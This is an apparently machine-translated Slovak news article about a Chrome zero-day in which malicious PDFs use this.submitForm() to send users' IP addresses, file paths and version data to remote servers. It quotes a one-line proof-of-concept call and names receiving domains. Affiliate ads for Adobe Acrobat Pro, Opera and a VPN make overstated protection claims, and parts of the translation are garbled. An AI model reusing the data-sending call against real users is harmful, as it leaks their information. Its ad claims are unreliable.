- EdgeSpot objavil zaujímavú zraniteľnosť nulového dňa zneužívajúcu dokumenty PDF v prehliadači Chrome.
- Toto zraniteľnosť vám môže ublížiť získaním citlivých údajov v počítači.
- Preskúmajte naše Webová a cloudová stránka pre viac informácií o ďalších nástrojoch a službách.
- Ak máte záujem o prehliadače, poskytujeme o nich veľa informácií v našom Centrum prehľadávačov.
Sprístupnite a zabezpečte všetky svoje dokumenty pomocou aplikácie Adobe Acrobat Reader. Tento nástroj na správu dokumentov vám tiež umožní elektronický podpis a vytváranie úradných formulárov, aby ste šetria čas v práci. Získajte ho pre svoj počítač a budete môcť:
- Otvárajte, tlačte a upravujte všetky svoje súbory PDF a ďalšie typy súborov
- Ľahšie vypĺňajte formuláre PDF
- Udržujte svoje základné dokumenty šifrované
Získajte všetky aplikácie za špeciálnu cenu!
Svetový softvér na správu dokumentov č. 1 je teraz za skvelú cenu, takže sa poponáhľajte!
Služba detekcie zneužitia EdgeSpot zistila, že je veľmi zaujímavá Chrome zraniteľnosť 0 dní využívajúca dokumenty PDF.
Zraniteľnosť umožňuje útočníkom zber citlivých údajov pomocou škodlivých dokumentov PDF otvorených v prehliadači Chrome.
Hneď ako postihnutý otvorí príslušné súbory PDF v prehliadači Google Chrome, začne na pozadí pracovať škodlivý program, ktorý zhromažďuje údaje o používateľoch.
Údaje sa potom preposielajú na vzdialený server, ktorý je kontrolovaný hackermi. Možno by vás zaujímalo, aké údaje útočníci nasávajú, ale vo vašom počítači zacieľujú na tieto údaje:
- IP adresa
- Úplná cesta k súboru PDF v systéme
- Verzie OS a Chrome
Dávajte pozor na súbory PDF, ktoré sú napadnuté škodlivým softvérom
Odborníci bodkovaný že jedna z dvoch domén readnotify [.] com alebo burpcollaborator [.] net prijímal údaje.
Odhalili, že útočníci používajú this.submitForm () PDF Javascript API na zhromažďovanie citlivých informácií používateľov.
Testovali sme to s minimálnym PoC, čo je jednoduché volanie API this.submitForm („ http://google.com/test’) prinúti Google Chrome odosielať osobné údaje na google.com.
Túto chybu prehliadača Chrome využívali dve odlišné sady škodlivých súborov PDF, ktoré sa šírili v októbri 2017 a v septembri 2018.
Zhromaždené údaje môžu útočníci predovšetkým použiť na doladenie útokov v budúcnosti. Správy naznačujú, že prvá dávka súborov bola zostavená pomocou sledovacej služby PDF ReadNotify.
Používatelia môžu službu využívať na sledovanie používateľských zobrazení. EdgeSpot nezdieľal žiadne podrobnosti týkajúce sa povahy druhej sady súborov PDF.
Rýchly tip: Zmeňte prehliadač na Opera
V týchto problémových časoch sme na každom kroku napadnutí malvérom, phishingom a trójskymi koňmi, takže musíme byť oveľa ostražitejší a zostať chránení.
Pretože sa jedná o problém špecifický pre Chrome, tejto hrozbe a všetkým ostatným sa môžete vyhnúť pomocou bezpečnostne orientovaného prehliadača Opera.
Tento prehliadač je dodávaný so zabudovaným blokovačom reklám, ktorý nielenže vyrušuje takéto rozptýlenie, ale aj blokuje analytické skripty, sledovacie pixely a metódy zhromažďovania vašich údajov.
A ak si chcete byť úplne istí, že nedržíte žiadne nebezpečenstvo, choďte za vstavané VPN služba, ktorá je 100% zadarmo na neobmedzený čas.
Opera
Opera ponúka dokonalú ochranu pred hrozbami vďaka vstavanému blokovaniu reklám a službe VPN zadarmo!
Navštíviť webovú stránku
Ako môžem zostať chránený pred zraniteľnosťou PDF?
Stiahnite si Adobe Acrobat PRO
Adobe a Chrome sa pri práci so súbormi PDF dobre hodia. Nainštalovaním aplikácie Adobe Extension pre Chrome môžete skontrolovať a manipulovať s dokumentmi PDF podľa svojich predstáv bez toho, aby ste opustili svoj obľúbený prehliadač.
Napriek svojej robustnej štruktúre nemusí byť malware skrytý v súboroch PDF zistený, ak používate štandardnú verziu aplikácie Reader.
Profesionálna verzia sa odporúča, aby bola zaručená vaša ochrana a vaše údaje boli chránené pred hackermi.
Aj keď to nie je zadarmo, cena, ktorú zaplatíte, je pomerne malá za množstvo ďalších funkcií, ktoré vás potešia, vrátane vylepšenej bezpečnosti vašich súborov PDF.
Súčasťou je aj 7-dňová bezplatná skúšobná verzia, aby ste si pred zakúpením mohli vyskúšať všetky výhody verzie Pro.
Adobe Acrobat PRO
Stiahnite si aplikáciu Adobe Acrobat PRO a vyhýbajte sa malvéru. Má oveľa viac funkcií ako bezplatná verzia a chráni vaše dáta.
Navštíviť webovú stránku
Ak chcete byť pri surfovaní na internete v bezpečí, musíte si zaobstarať plne špecializovaný nástroj na zabezpečenie svojej siete. Nainštalujte si súkromný prístup na internet teraz a zabezpečte sa. Chráni váš počítač pred útokmi počas prehliadania, maskuje vašu adresu IP a blokuje akýkoľvek nechcený prístup.
Služba detekcie zneužitia EdgeSpot chcela upozorniť používateľov prehliadača Chrome na potenciálne riziká, pretože sa neočakávalo vydanie opravy v blízkej budúcnosti.
EdgeSpot informoval Google o zraniteľnosti minulý rok a spoločnosť sľúbila, že patch vydá koncom apríla.
Môžete však zvážiť použitie dočasného riešenia problému lokálnym prezeraním prijatých dokumentov PDF pomocou inej aplikácie na čítanie.
Dokumenty PDF môžete tiež otvoriť v prehliadači Chrome odpojením svojich systémov od Internetu.
často kladené otázky
Áno. Ale ak chcete širší výber, preskúmať naše najlepšie tipy pre Chromesúkromia rozšírenia v tohto kompletného sprievodcu.
Ttu je veľa rozšírení, ktoré umožňujú PDF spracovanie. Skontrolujte z našej vynikajúci sprievodca o najlepších príponách PDF pre Chrome.
Nie je, ale môžete ho rýchlo aktivovať. Tu je náš komplexný sprievodca o tom, ako povoliť generátor QR kódov v prehliadači Chrome.
